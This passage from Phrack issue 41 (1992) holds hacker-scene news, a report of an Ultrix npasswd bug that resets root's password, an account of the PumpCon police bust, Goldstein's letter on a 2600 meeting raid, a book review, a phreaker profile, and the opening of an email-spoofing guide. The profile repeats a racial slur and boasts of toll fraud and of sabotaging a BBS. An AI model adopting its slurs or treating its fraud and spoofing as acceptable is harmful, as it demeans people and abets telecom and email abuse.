  830. days until it was taken down by security.
  831.  
  832. This event was photographed and videotaped by EGATOBAS Productions, to preserve
  833. this landmark in history.  And now you can witness the event.  For a limited
  834. time we are offering a 11" x 17" full color poster of the Jolly Roger Pirate
  835. flag flying high over AT&T, with the AT&T logo in plain view, with the caption;
  836. "WE CAME, WE SAW, WE CONQUERED."  These are $5.50 each and are laminated.
  837.  
  838. Also available, by request is a 20" x 30" full color photograph, and a cotton
  839. T-shirt with the same full color picture on the front, for $20 each.
  840.  
  841. If you are interested in purchasing any of the above items, simply send check
  842. or money order for the amount to:
  843.  
  844. CyberPunk System
  845. P.O. Box 771027
  846. Wichita, KS  67277-1072
  847.  
  848. A GIF of this is also available from CyberPunk System, 1:291/19, 23:316/0,
  849. 72:708/316, 69:2316/0.  FREQ magicname PIRATE
  850.  
  851. Any questions, send them to Legacy@cpu.cyberpnk1.sai.com
  852.  
  853. _______________________________________________________________________________
  854.  
  855.  Ultrix 4.2 Bug
  856.  ~~~~~~~~~~~~~~
  857.  By Krynn
  858.  
  859. A bug was discovered in Ultrix 4.2 upgrade version.  It involves npasswd, and
  860. root.  It is quite simple, and a patch/fix is available.  Here is a description
  861. of the hole:
  862.  
  863. Sys Admin's username:  mradmin
  864. Any user's username :  mruser
  865.  
  866. Okay, mruser has forgotten his password, which isn't good.  Mruser goes to
  867. mradmin and asks mradmin to change his password to newpass.  Mradmin does so.
  868.  
  869. Mradmin now will su to root, and npasswd mruser.  He will enter mruser's new
  870. password, newpasswd.  It will appear in the /etc/passwd that mruser's password
  871. is a "*" (shadowed), and that it has been changed, but it hasn't.
  872.  
  873. The password changed was root's, meaning root's password is now newuser.
  874.  
  875. A fix is available via anonymous ftp at:
  876.  
  877. black.ox.ac.uk /src/npasswd.enhanced.shar.Z
  878.  
  879. The original is there as /src/npasswd jpl.tar.Z
  880. _______________________________________________________________________________
  881.  
  882.  PumpCon Hosed                                                 November 5, 1992
  883.  ~~~~~~~~~~~~~
  884.  by Phil "The Outlander"
  885.  
  886. PumpCon '92 was held this past weekend at the Westchester Courtyard by
  887. Marriott, and was shut down in spades.
  888.  
  889. It began like any typical hacker/phreak/cyberpunk's convention, with lots of
  890. beer, lots of shooting the bull, and lots of people from around the country,
  891. except that the guests got sloppy, stupid, noisy, and overconfident.
  892.  
  893. The manager of the hotel, accompanied by three town of Greenborough police
  894. officers, entered the room at approximately 10pm on Saturday.  The manager had
  895. received complaints about noise and vandalism from some of the hotel's other
  896. guests.  She claims to have tried to call the room several times before
  897. physically entering, but the room's telephone line was consistently busy.
  898.  
  899. The police officers noticed the multiple open (and empty) beer bottles
  900. scattered around the room and were gearing up to make some arrests for
  901. "Unlawful Possession of Alcoholic Beverages by Underage Persons" when one of
  902. the policemen spotted an Amiga, connected to a US Robotics modem, which was in
  903. turn connected to the suite's phone line.  The "stolen" calling card was all
  904. the probable cause necessary to upgrade the charges to "Wire Fraud."
  905.  
  906. Everyone in the suite was detained for questioning.  Standard investigation
  907. procedure was followed.  The entire case was handled by local authorities,
  908. including the Westchester County DA.  To my knowledge, the FBI and Bell
  909. Security people were not called in (or if they were, it was after I was
  910. released).
  911.  
  912. Each detainee was body-searched for diskettes, hand-written notes about credit
  913. and computer services, autodialers, and the like.  The suite where PumpCon had
  914. taken place was also searched.  Hardware seized includes at least two Amigas
  915. with monitors, modems, and diskettes, and one AT&T dumb terminal with modem.
  916.  
  917. Each of the detainees was interviewed in turn.  Just before dawn on the morning
  918. of Sunday, November 1st, the police began making the actual arrests.  Four to
  919. eight people were arrested and taken to the local jail.
  920.  
  921. The rest of the detainees were released with no charges or arrests filed.
  922.  
  923. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  924.  
  925. And now on a personal note to anybody who is new to the world of hacking:
  926.  
  927. Many of the attendees to PumpCon '92 were just like me.  I was aware of the
  928. possible consequences of an arrest, but the full enormity of the possibilities
  929. hadn't sunk in.  Getting busted can really ruin your life, and I am unwilling
  930. to sacrifice my liberty and get a criminal record just for the thrill of
  931. hanging out with the "eleet."
  932.  
  933. I was personally terrified out of my skull and went right off any dreams I had
  934. of being some kind of big-time cyberpunk.  The law had us outgunned ten to one
  935. (literally and figuratively) and I as I write this on Monday night I still
  936. haven't stopped shaking.
  937.  
  938. To anyone who hasn't considered what it would be like to get seriously busted,
  939. I want you to try and picture the scene that night, and comes the dawn, a lot
  940. of the people you were partying with just twelve hours earlier are carted away
  941. in handcuffs to face an uncertain future.
  942.  
  943. The attendees of PumpCon, including myself and with few exceptions, were utter
  944. and complete fools.  They thought that they could act like jerks, bust up the
  945. hotel, and phreak off the room lines without bringing down the heat like a jet
  946. of molten lava.  They thought they were too smart to get caught.  They thought
  947. that they were immortal.  They thought wrong, and now some of them are going to
  948. pay for it.
  949.  
  950. I got lucky.  I was released, and I learned some invaluable lessons.
  951.  
  952. I can't stress enough to anybody out there who is treating the state of the
  953. Hack like it's a big game:  You aren't going to get your marbles back when the
  954. night is over.  The stakes are real.  Ask yourself if you can deal with the
  955. possibilities of ruining your life before it's even begun.
  956.  
  957. Everyone must make their own decision.  You are only given this one chance to
  958. bail out now; any others that come along are blessings from on high.
  959.  
  960. If you do decide to live in the computer underground, I can only offer this
  961. advice:  Cover your a$$.  Do not act foolishly.  Do not associate with fools.
  962. Remember that you are not immortal, and that ultimately there are no safety
  963. nets.  Intelligence can't always save you.  Do not, in your arrogance, believe
  964. that it will.  My time as a cyberpunk has been short and undistinguished but it
  965. has taught me this much.
  966.  
  967. I'm not saying that you should not become a hacker.  If that is truly your
  968. wish, then I'm not one to stop you.  I'm just warning you that when the fall
  969. comes, it can come hard, and there's nobody who can help you when you've gone
  970. far enough past the line.
  971.  
  972.      Phil "The Outlander"
  973. _______________________________________________________________________________
  974.  
  975.  2600 Meeting Disrupted by Law Enforcement                    December 12, 1992
  976.  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  977.  by Emmanuel Goldstein (Editor of 2600 Magazine)
  978.  
  979. The following is a letter I wrote to the Washington Post in response to their
  980. article about the incidents at the Pentagon City Mall on November 6, entitled,
  981. "Hackers Allege Harassment at Mall" (dated November 13, page A1).  Their
  982. article failed to focus on the startling revelation of federal government
  983. involvement and the ominous implications of such an action.  The article also
  984. does little to lessen the near hysteria that is pumped into the general public
  985. every time the word "hacker" is mentioned.
  986.  
  987. Let us take a good look at what has been confirmed so far.  A group of computer
  988. hackers gathered at a local mall as they do once a month.  Similar meetings
  989. have been going on in other cities for years without incident.  This gathering
  990. was not for the purposes of causing trouble and nobody has accused the hackers
  991. of doing anything wrong.  Rather, the gathering was simply a place to meet and
  992. socialize.  This is what people seem to do in food courts and it was the
  993. hackers' intention to do nothing more.
  994.  
  995. When mall security personnel surrounded the group and demanded that they all
  996. submit to a search, it became very clear that something bizarre was happening.
  997. Those who resisted were threatened with arrest.  Everyone's names were written
  998. down, everyone's bags gone through.  One person attempted to write down the
  999. badge numbers of the people doing this.  The list was snatched out of his hand
  1000. and ripped to pieces.  Another hacker attempted to catch the episode on film.
  1001. He was apprehended and the film was ripped from his camera.  School books,
  1002. notepads, and personal property were seized.  Much of it has still not been
  1003. returned.  The group was held for close to an  hour and then told to stay out
  1004. of the mall or be arrested.
  1005.  
  1006. This kind of treatment is enough to shock most people, particularly when
  1007. coupled with the overwhelming evidence and eyewitness accounts confirming no
  1008. unusual or disruptive behavior on the part of the group.  It is against
  1009. everything that our society stands for to subject people to random searches and
  1010. official intimidation, simply because of their interests, lifestyles, or the
  1011. way they look.  This occurrence alone would warrant condemnation of a blatant
  1012. abuse of power.  But the story doesn't end there.
  1013.  
  1014. The harassment of the hackers by the mall police was only the most obvious
  1015. element.  Where the most attention should be focused at this point is on the
  1016. United States Secret Service which, according to Al Johnson, head of mall
  1017. security, "ramrodded" the whole thing.  Other media sources, such as the
  1018. industry newsletter Communications Daily, were told by Johnson that the Secret
  1019. Service was all over the mall that day and that they had, in effect, ordered
  1020. the harassment.  Arlington police confirm that the Secret Service was at the
  1021. mall that day.
  1022.  
  1023. It is understood that the Secret Service, as a branch of the Treasury
  1024. Department, investigates credit card fraud.  Credit card fraud, in turn, can be
  1025. accomplished through computer crime.  Some computer hackers could conceivably
  1026. use their talents to accomplish computer crime.  Thus we arrive at the current
  1027. Secret Service policy, which appears to treat everybody in the hacker world as
  1028. if they were a proven counterfeiter.  This feeling is grounded in
  1029. misperceptions and an apprehension that borders on panic.  Not helping the
  1030. situation any is the ever-present generation gap -- most hackers are young and
  1031. most government officials are not.
  1032.  
  1033. Apart from being disturbed by the gross generalizations that comprise their
  1034. policy, it seems a tremendous waste of resources to use our Secret Service to
  1035. spy on public gatherings in shopping malls.  It seems certain to be a violation
  1036. of our rights to allow them to disrupt these meetings and intimidate the
  1037. participants, albeit indirectly.  Like any other governmental agency, it is
  1038. expected that the Secret Service follow the rules and not violate the
  1039. constitutional rights of citizens.
  1040.  
  1041. If such actions are not publicly condemned, we will in effect be granting a
  1042. license for their continuance and expansion.  The incident above sounds like
  1043. something from the darkest days of the Soviet Union when human rights activists
  1044. were intimidated by government agents and their subordinates.  True, these are
  1045. technology enthusiasts, not activists.  But who they are is not the issue.  We
  1046. cannot permit governmental abuse of any person or group simply because they may
  1047. be controversial.
  1048.  
  1049. Why do hackers evoke such controversy?  Their mere presence is an inconvenience
  1050. to those who want so desperately to believe the emperor is wearing clothes.
  1051. Hackers have a tendency of pointing out the obvious inadequacies of the
  1052. computer systems we entrust with such a large and growing part of our lives.
  1053. Many people don't want to be told how flimsily these various systems are held
  1054. together and how so much personal data is readily available to so many.
  1055. Because hackers manage to demonstrate how simple it is to get and manipulate
  1056. this information, they are held fully responsible for the security holes
  1057. themselves.
  1058.  
  1059. But, contrary to most media perceptions, hackers have very little interest in
  1060. looking at other people's personal files.  Ironically, they tend to value
  1061. privacy more than the rest of us because they know firsthand how vulnerable it
  1062. is.  Over the years, hackers have gone to the media to expose weaknesses in our
  1063. credit reporting agencies, the grading system for New York City public schools,
  1064. military computer systems, voice mail systems, and even commonly used push
  1065. button locks that give a false sense of security.  Not one of these examples
  1066. resulted in significant media attention and, consequently, adequate security
  1067. was either delayed or not implemented at all.
  1068.  
  1069. Conversely, whenever the government chooses to prosecute a hacker, most media
  1070. attention focuses on what the hacker "could have done" had he been malicious.
  1071. This reinforces the inaccurate depiction of hackers as the major threat to our
  1072. privacy and completely ignores the failure of the system itself.
  1073.  
  1074. By coming out publicly and meeting with other hackers and non-hackers in an
  1075. open atmosphere, we have dispelled many of the myths and helped foster an
  1076. environment conducive to learning.  But the message we received at the Pentagon
  1077. City Mall tells us to hide, be secretive, and not trust anybody.  Perhaps
  1078. that's how the Secret Service wants hackers to behave.  But we are not
  1079. criminals and we refuse to act as such simply because we are perceived that way
  1080. by uninformed bureaucrats.
  1081.  
  1082. Regardless of our individual outlooks on the hacker issue, we should be
  1083. outraged and extremely frightened to see the Secret Service act as they did.
  1084. Whether or not we believe that hackers are decent people, we must agree that
  1085. they are entitled to the same constitutional freedoms the rest of us take for
  1086. granted.  Any less is tantamount to a very dangerous and ill-advised precedent.
  1087.  
  1088.      Emmanuel Goldstein
  1089.      Editor, 2600 Magazine -- The Hacker Quarterly (516)751-2600
  1090.  
  1091. (NOTE: 2600 Magazine coordinates monthly hacker meetings throughout the
  1092.        country.)
  1093. _______________________________________________________________________________
  1094.  
  1095.  Two New Hardcovers                                           November 24, 1992
  1096.  ~~~~~~~~~~~~~~~~~~
  1097.  by Alan J. Rothman (New York Law Journal)(Page 5)
  1098.  
  1099. During the opening sequence of the classic English television series "The
  1100. Prisoner," the lead character known only as Number 6 (brilliantly played by
  1101. Patrick McGoohan) is abducted and taken to a secret location called "The
  1102. Village."  He desperately pleads with his captors "What do you want?"  Their
  1103. grim response is "Information."  Through 17 thrilling episodes, his kidnappers
  1104. staged elaborate high-tech ruses to find out why he quit work as a spy.
  1105.  
  1106. Had this story been set in the 1990s rather than the 1960s, all The Village's
  1107. proprietors would have needed was a PC and a modem.  They could have assembled
  1108. a composite of Number 6's movements by cross-referencing records from any of
  1109. the commercial data bases containing the details of nearly everyone's daily
  1110. activities.  Then with a bit of ingenuity, they could have tried to steal even
  1111. more information by hacking into other restricted data systems.
  1112.  
  1113. No longer fiction, but common fact, the billowing growth in the computers and
  1114. telecommunications networks everywhere is generating urgent legal issues
  1115. regarding the content, usage and ownership of the data coursing through them.
  1116. Dilemmas have also surfaced concerning the responsibilities of the businesses
  1117. which gather, sift and repackage such information.  Indeed, a critical juncture
  1118. has now been reached where the basic constitutional rights of privacy and
  1119. expression are colliding with the ever-expanding reach of modern technology.
  1120.  
  1121. Two well-crafted books have recently been published which together frame the
  1122. spectrum of relevant individual rights issues in these areas with uncanny
  1123. symmetry.  Fortunately, neither degenerates into a "computers are bad"
  1124. jeremiad.  Rather, they portray an appropriate balance between the virtues of
  1125. computerization and disturbing cases of technological misuse for wrongful
  1126. commercial and governmental ends.
  1127.  
  1128. Presenting array of new forms of electronic encroachment on personal privacy is
  1129. Jeffrey Rothfeder's alarming new book, "Privacy for Sale: How Computerization
  1130. Has Made Everyone's Private Life an Open Secret" (Simon & Schuster, 224 pages,
  1131. $22).  He offers the chilling thesis that anyone can find out nearly anything
  1132. regarding anybody and there is nowhere left to hide.  He convincingly states
  1133. his case in a concise and insightful exploration of the trends and abuses in
  1134. the mass processing of personal data.
  1135.  
  1136. The fascinating mechanics of how and where information about virtually every
  1137. aspect of our lives is gathered and then computerized are extensively
  1138. described.  The most productive fonts include medical records, credit
  1139. histories, mortgage applications, subscription lists, phone records, driver's
  1140. licenses and insurance forms.  Yet notwithstanding the legitimate commercial
  1141. and regulatory reasons for providing these facts, the author carefully
  1142. documents another more deeply hidden and troubling consequence of volunteering
  1143. such information: It is constantly resold, combined with other sources and
  1144. reused without your knowledge or permission for purposes entirely different
  1145. from those you first intended.
  1146.  
  1147. Mr. Rothfeder alleges the most perilous result of these activities is the
  1148. growing and highly organized sales, integration and cross-matching of
  1149. databases.  Businesses and government entities now have sophisticated software
  1150. to generate complex demographic profiles about individuals, populations and
  1151. geographic areas.  In turn, these computer-generated syntheses are increasingly
  1152. used for invasive and discriminatory purposes.
  1153.  
  1154. Numerous examples of such misuse are cited, ranging from slightly annoying to
  1155. purely horrifying.  The astonishing breadth of this roster includes the sale of
  1156. driver's license information with height weight specifications to clothes
  1157. marketers for tall men and thin women, purchases of credit histories and
  1158. workmen's compensation claims reports by prospective employers who believe this
  1159. material is indicative of a job applicant's character, and the creation of
  1160. "propensity files" by federal agencies to identify people who have not
  1161. committed any offense but might likely be criminals.
  1162.  
  1163. Two additional problems pervade the trafficking of intimate information.
  1164. First, there is little or no federal legislation to effectively protect people
  1165. from certain problems presented in the book.  For example, the release of
  1166. medical records thought to be "confidential" is virtually unprotected.
  1167.  
  1168. Second, it can be extremely difficult to have false entries corrected before
  1169. they have a ripple effect on your other data.  Beyond the common tales of
  1170. frustration at clearing up a faulty credit report, Mr. Rothfeder relates the
  1171. case of a man denied any health insurance because his medical records contained
  1172. an erroneous report he was HIV positive.
  1173.  
  1174.  
  1175. JOURNEY IN CYBERSPACE
  1176.  
  1177. Turning to a much more accurate account, author Bruce Sterling takes readers
  1178. into the ethereal realm of "cyberspace" where computers, networks, and
  1179. electronic bulletin boards systems (BBS) are linked together by phone.  In his
  1180. first non-fiction work, "The Hacker Crackdown: Law and Disorder on the
  1181. Electronic Frontier" (Bantam, 328 pages, $23), he chronicles the U.S.
  1182. government's highly visible efforts in 1990 to prosecute "hackers" it suspected
  1183. of committing crimes by PC and modem.  However, Mr. Sterling distinguishes this
  1184. term as being more about active computer enthusiasts, most of whom have never
  1185. committed any wrongdoing.  The writer's other credits include some highly
  1186. regarded "cyberpunk" science fiction, where computer technology is central to
  1187. the plots and characters.
  1188.  
  1189. The "crackdown" detailed by the author began with the crash of AT&T's long-
  1190. distance phone system on January 15, 1990.  Although it has never been proven
  1191. that hackers were responsible, this event served as the final catalyst to spur
  1192. federal law enforcement agencies into concerted action against a suspected
  1193. underground of computer criminals.  A variety of counter-operations were
  1194. executed.  Most notable was Operation Sundevil the following May when agents
  1195. around the country seized 42 computer systems, 23,000 diskettes, and halted 25
  1196. BBS's where the government believed hackers were exchanging tips of the trade.
  1197.  
  1198. Some of the government's resulting prosecutions through their nationwide
  1199. efforts were moderately successful. However, the book's dramatic centerpiece is
  1200. the trial of Craig Neidorf (a.k.a. Knight Lightning).  Mr. Neidorf was a
  1201. contributor to Phrack, an electronic magazine catering to hackers, available on
  1202. various BBS's.
  1203.  
  1204. In January 1989, another hacker named "Prophet" transmitted a document he
  1205. pilfered from BellSouth's computers regarding the 911 emergency system to
  1206. Neidorf.  Together they edited the text, which Neidorf then published in
  1207. Phrack.  In July 1990, he was placed on trial for federal charges of entering a
  1208. fraudulent scheme with Prophet to steal this document.  The government alleged
  1209. it was worth $79,499 and that its publication threatened emergency operations.
  1210. To the prosecutor's dismay, the case was dropped when the defense proved the
  1211. same material was publicly available for only $13.
  1212.  
  1213. With insight and style, Mr. Sterling uses this and other events to cast
  1214. intriguing new spins on applicable civil liberties issues.
  1215.  
  1216. Are the constitutional guarantees of freedom of expression and assembly fully
  1217. extended to BBS dialogs and gatherings?  What degree of privacy can be expected
  1218. for personal data on systems which may be subject to surreptitious entry?  Are
  1219. hackers really breaking any laws when merely exploring new systems?  Is posting
  1220. a message or document on a BBS considered a "publication"?  Should all BBS's be
  1221. monitored just because of their potential for illegal activity?  What are the
  1222. responsibilities of BBS operators for the contents of, and access to, their
  1223. systems?
  1224.  
  1225. The efforts of Mitchell Kapor, the co-developer of Lotus 123 and now chairman
  1226. of ONtechnology, are depicted as a direct response to such issues raised by the
  1227. crackdown.  Mr. Kapor assembled a prominent group of fellow computer
  1228. professionals to establish the Electronic Frontier Foundation (EFF), dedicated
  1229. to education and lobbying for free speech and expression in electronic media.
  1230. As well, EFF has provided support to Craig Neidorf and others they consider
  1231. wrongly charged with computer crime.
  1232.  
  1233. Weighty legal matters aside, the author also embellishes his story with some
  1234. colorful hacker lore.  These denizens of cyberspace are mostly young men in
  1235. their late teens or early twenties, often fueled by junk food and propelled by
  1236. macho.  Perhaps their most amusing trait is the monikers they adopt --
  1237. Bloodaxe, Shadowhawk, and of course, Phiber Optik.
  1238.  
  1239. Someone else, a non-hacker involuntary given the pseudonym "Number 6," knew his
  1240. every act was continually being monitored and recorded against his will.  As a
  1241. manifestation of resistance to this relentless surveillance, he often bid
  1242. farewell to other citizens of the Village with a sarcastic "Be seeing you."
  1243. Today, the offerings of authors Rothfeder and Sterling provide a resounding
  1244. "And you" as a form of rejoinder (often uttered by The Village's citizens as
  1245. well), to publicize the ironic diversity threats wrought by information
  1246. technology.
  1247.  
  1248. Number 6 cleverly managed to escape his fictional captivity in The Village
  1249. during the final (and mind-boggling) episode of The Prisoner.  However, based
  1250. on the compelling evidence presented in these two books, the protection of
  1251. individual rights in the reality of today's evolving "global village" of
  1252. computer networks and telecommunications may not be so neatly resolved.
  1253. _______________________________________________________________________________
  1254.  
  1255.                                 ==Phrack Inc.==
  1256.  
  1257.                    Volume Four, Issue Forty-One, File 3 of 13
  1258.  
  1259.                               ==Phrack Pro-Phile==
  1260.  
  1261.                           Created by Taran King (1986)
  1262.  
  1263. _______________________________________________________________________________
  1264.  
  1265.      Welcome to Phrack Pro-Phile.  Phrack Pro-Phile is created to bring info to
  1266. you, the users, about old or highly important/controversial people.  This
  1267. month, we bring to you certainly one of the most controversial people (and
  1268. handles) to ever emerge in the computer underground...
  1269.  
  1270.                                   Supernigger
  1271.                                   ~~~~~~~~~~~
  1272. _______________________________________________________________________________
  1273.  
  1274.  Personal
  1275.  ~~~~~~~~
  1276.            Handle:  Supernigger
  1277.          Call him:  SN
  1278.     Date of Birth:  Years ago
  1279.               Age:  Getting along in the years.
  1280.            Height:  Medium
  1281.            Weight:  Medium
  1282.   Computers owned:  Commodore Vic-20, C64, Amiga, 386 Compatible
  1283.  
  1284.      How did this handle originate?  Back in 1985, I had blueboxed to a bridge.
  1285. Someone on there, for some reason, decided that he didn't like me, and shouted,
  1286. "Get off, nigger!"  He then proceeded to knock me off with a 2600 Hz tone.  I
  1287. immediately called back with something "un-2600 hz-able" and, when he shouted,
  1288. "Get off nigger!" and blew 2600 hz, I then said, "I'm SUPERnigger, you can't
  1289. knock me off, I've got the POWER!!"  Fun, eh?
  1290.  
  1291.  
  1292.  How I Got Started
  1293.  ~~~~~~~~~~~~~~~~~
  1294.      Back in '82 or '83, I got a wonderful computer called a Commodore Vic-20.
  1295. With that, I wrote a few irrelevant programs and played "Gorf!" a lot.  Then, a
  1296. friend suggested that I get a Commodore C-64 and disk drive for all the RAD
  1297. WhErEz! it had.
  1298.  
  1299.        Needless to say, I was not disappointed.  Then a friend showed me a
  1300. 5-digit number you could put in after calling an access number, and it would
  1301. put a call through for you!  Imagine that!  This, I thought, was the key to
  1302. UNLIMITED WARES!
  1303.  
  1304.      Then, the new ware scene became tiresome and boring REAL quick.  I had
  1305. them all.  New ones.  Old ones.  Middle-aged ones.  I had wares coming out of
  1306. my ass.  Just when I was about to drop out of the scene, I saw a number posted
  1307. on a board for InterCHAT (201), a multi-line chat system.
  1308.  
  1309.      That's where the cavalcade of fun and interesting endeavors began.  That's
  1310. where I met Sharp Remob, Lord_foul (DP), Dark Wanderer and other members of
  1311. DPAK.
  1312.  
  1313.      Speaking of DPAK, the group was created when we found a glitch in the MCI
  1314. access # that allowed any 14-digit code to work.  We then made up the joke,
  1315. "Today at 2:00 PM, DPAK Agents cornered an MCI official and said, 'You WILL
  1316. give these people free calls!'" and proceeded to tell people about the glitch
  1317. ("DPAK" came from Mad Hacker 312, who, when asked about obtaining non-published
  1318. numbers, said, "Oh, you'd have to be a DPAK Agent to get that.").
  1319.  
  1320.      After that, DPAK was tracing people before Caller ID came out, finding and
  1321. creating bridges, setting up an 800 # for InterCHAT (actually 2 if you were
  1322. quick enough to catch the second one), putting out Sharp Remob's Social
  1323. Engineering file, and other things that I had better not mention (I would go
  1324. on, but I think I might frighten you.).
  1325.  
  1326.      I would have to say that I feel negatively toward "elite posers," people
  1327. who claim to know things with the sole purpose of trying to seem "cool."  These
  1328. are the people you see boasting about how long they have been around (which is
  1329. irrelevant), spurting out random acronyms when they have no idea how they are
  1330. actually used, and trying to make something complicated and mysterious out of
  1331. something mundane and simple.  For example:  "Hey dude, watch out, I may be
  1332. listening in on your line right now with a DAMT," or "Oh, I'll just use the DRT
  1333. trunk multiplexor to do a Random Interphase-seizure of the tandemized trunk."
  1334. (Barf!)
  1335.  
  1336.      Also, I think this government crackdown really sucks.  What sucks is the
  1337. fact that the government is going after big NAMES instead of big -CRIMES-.
  1338. Rather than stopping crimes, they just want to "show who's boss."  A lot of
  1339. innocent lives are being ruined.  In fact, after this issue of Phrack comes
  1340. out, I plan to lay VERY low because they will probably want to get me now that
  1341. my handle was in a phreak/hack publication.
  1342.  
  1343.  
  1344.  Interests
  1345.  ~~~~~~~~~
  1346.  
  1347.               Women:  Fast
  1348.                Cars:  Fast (VWs)
  1349.                Food:  Fast
  1350.               Music:  All kinds (Rap, Rock, Metal, you name it)
  1351. Favorite performers:  2 Live Crew
  1352.     Favorite author:  Lord Digital (the father of ELITE!ness)
  1353.       Favorite Book:  Nat!onal Enl!ghtener
  1354.  
  1355.  
  1356.  Most Memorable Experiences
  1357.  ~~~~~~~~~~~~~~~~~~~~~~~~~~
  1358.      "It works!  It works!!" -- when the 800 # for InterCHAT actually worked.
  1359. If you called it, you remember.  That took a lot of work...
  1360.  
  1361.      Also, at one point in time, every chat system in New Jersey was forwarded
  1362. to InterCHAT..  That was truly hilarious.  I strongly suggest, at this point,
  1363. that everyone refrain from attempting these things.  The consequences are a bit
  1364. more serious now.  But if you must, be VERY very careful.
  1365.  
  1366.      ...And, I would like to take this opportunity to clear up the "Free World
  1367. II Incident" and other vague and unclear statements chronicled in Phrack 28.
  1368. First of all, I -DID NOT- crash Black Ice BBS.  In fact, some hick from Texas
  1369. already stated to me that he wrote my name on the BBS when it was crashed.  The
  1370. same hick tends to lie and spread rumors a lot, so I don't actually know if it
  1371. was him that wrote my name.  Suffice to say that I didn't crash it.
  1372.  
  1373.      Secondly, and most important, Free World II BBS was forwarded to InterCHAT
  1374. because Major Havoc was a complete and total ASSHOLE.
  1375.  
  1376.      I called his system and applied for access.  When I tried to get back on,
  1377. I found that my application had been deleted without so much as a notification,
  1378. so I thought that the BBS hadn't saved it correctly and applied again.  I found
  1379. the BBS hadn't saved it correctly a second time, and when I tried to fill out
  1380. the application once more, Major Havoc broke in and typed things like "Get the
  1381. fuck off here" and "Hang the fuck up."  I typed "Fine, have it your way" and
  1382. proceeded to forward his BBS # to InterCHAT.  You can't just treat people like
  1383. that and expect nothing to happen.
  1384.  
  1385.      The opening message on InterCHAT said:  "Until Major Havoc learns the
  1386. meaning of the word TACT (dealing with people in a non-offensive manner), his
  1387. BBS has been put to better use."
  1388.  
  1389.      (I had called the BBS in the first place to try to clear up wild rumors
  1390. that The Blade had said were being tossed about on there).
  1391.  
  1392.      I hope this has cleared things up.
  1393.  
  1394.  
  1395.  Some People To Mention
  1396.  ~~~~~~~~~~~~~~~~~~~~~~
  1397.  
  1398. Sharp Remob :       He showed me the wonders of Social Engineering.  He is
  1399.                     making the big dollars now.
  1400.  
  1401. Lord_foul :         I never realized how many people he was in contact with.
  1402.                     Some pretty heavy hitters.  He never let on how much he
  1403.                     knew.
  1404.  
  1405. Applehead :         The best DJ in the phreak/hack world.  Truly, in mixing
  1406.                     records, no one is his equal.  Seems to be able to
  1407.                     mesmerize phone company employees into doing his bidding as
  1408.                     well.  Could these two things be related?
  1409.  
  1410. Meat Puppet :       "Money for nuthin, EVERYTHING for free."  Why anyone would
  1411.                     want 800 watts in their car I will never know.
  1412.  
  1413. Lung C00kiez :      He had the best conference ideas, like Want-Ad Fun and
  1414.                     Operator Frenzy.
  1415.  
  1416. *DETH*-2-*J00Z* :   So much for political correctness.  First person I know to
  1417.                     theorize how to trace people before Caller ID came out.
  1418.  
  1419. Dark Wanderer :     Works for Sun Microsystems now.  One of the few hackers I
  1420.                     know that has a technical computer-oriented career.
  1421.  
  1422. Krak Dealer :       Takes consciousness-altering to the level of an art form.
  1423.  
  1424. Squashed Pumpkin :  The enforcer.
  1425.  
  1426. DeeDee :            The only cool bridge chick.
  1427.  
  1428. Dr. Mike :          Cool guy when he's not threatening his girlfriend with a
  1429.                     knife.
  1430.  
  1431. Gatsby :            Gets the award for quick learner.
  1432.  
  1433. orpheus :           One of the true devotees of InterCHAT, and one of the few
  1434.                     people I know who is actually interested in HP-3000.
  1435.  
  1436. The whole InterCHAT crowd...  Made modeming fun.
  1437.  
  1438.      I should also mention a group of NYC individuals at this time.  I would
  1439. mention their names, but certain legal situations preclude that.  They showed
  1440. me what someone can REALLY do with an in-depth understanding of many systems.
  1441.  
  1442.      Suffice to say that they are the creme de la creme, probably the only
  1443. group up to par with DPAK.
  1444.  
  1445.      Oh, and I cannot, I MUST NOT forget to mention The Blade, who is truly a
  1446. legend in his own mind.
  1447.  
  1448.  
  1449.  The Future
  1450.  ~~~~~~~~~~
  1451.      I see the future for hacking/phreaking as pretty bleak.  Big Brother is
  1452. watching.  System Administrators are finally realizing that it is better to
  1453. make your system impenetrable than to prosecute kids (I wish the government
  1454. would realize this).  If you combine these two things, there is not much to
  1455. look forward to.
  1456.  
  1457.  In Closing...
  1458.  ~~~~~~~~~~~~~
  1459.      As for the standard Pro-Phile question (are most of the phreaks and
  1460. hackers that I've met computer geeks?), I have not met any phreakers or
  1461. hackers, so I can't say if they are geeks or not.  From phone conversations,
  1462. some seem like geeks, some don't.
  1463. _______________________________________________________________________________
  1464.  
  1465.                                 ==Phrack Inc.==
  1466.  
  1467.                    Volume Four, Issue Forty-One, File 4 of 13
  1468.  
  1469.                                Network Miscellany
  1470.             *******************************************************
  1471.            <              The POWER of Electronic Mail             >
  1472.             *******************************************************
  1473.                          Compiled from Internet Sources
  1474.  
  1475.                                 by The Racketeer
  1476.                               of The Hellfire Club
  1477.  
  1478.                     Network Miscellany created by Taran King
  1479.  
  1480.  
  1481.      First of all, this guide is more than using fakemail.  It literally
  1482. explains the interfaces used with SMTP in detail enough that you should gain a
  1483. stronger awareness of what is going on across the multitude of networks which
  1484. make up the worldwide e-mail connections.  It also contains my usual crude
  1485. remarks and grim hacker humor (assuming it hasn't again been edited out, but
  1486. I'm somewhat proud of the fact that Phrack heavily edited my "language" in last
  1487. issue's article.  Oh well.).
  1488.  
  1489.      There are two objectives in this file:  first, I will attempt to show that
  1490. by using fakemail and SMTP, you can cause an amazing number of useful, hacker
  1491. related stunts; second, I shall attempt to be the first hacker to ever send a
  1492. piece of electronic mail completely around the world, ushering in a new age of
  1493. computerdom!
  1494.  
  1495.      I suggest that, unless you don't want everyone lynching you, don't try to
  1496. fuck up anything that can't be repaired offhand.  I've experimented with
  1497. fakemail beyond this article and the results were both impressive and
  1498. disastrous.  Therefore, let's examine risks first, and then go onto the good
  1499. stuff.  Basic philosophy -- use your brain if you've got one.
  1500.  
  1501.  
  1502. RISKS:
  1503.  
  1504.      Getting caught doing this can be labeled as computer vandalism; it may
  1505. violate trespassing laws; it probably violates hundreds of NFS, Bitnet and
  1506. private company guidelines and ethics policies; and finally, it will no doubt
  1507. piss someone off to the point of intended revenge.
  1508.  
  1509.      Networks have fairly good tracing abilities.  If you are logged, your host
  1510. may be disconnected due to disciplinary referral by network authorities (I
  1511. don't think this has happened yet).  Your account will almost definitely be
  1512. taken away, and if you are a member of the source or target computer's
  1513. company/organization, you can expect to face some sort of political shit that
  1514. could result in suspension, expulsion, firing, or otherwise getting the short
  1515. end of the stick for awhile.
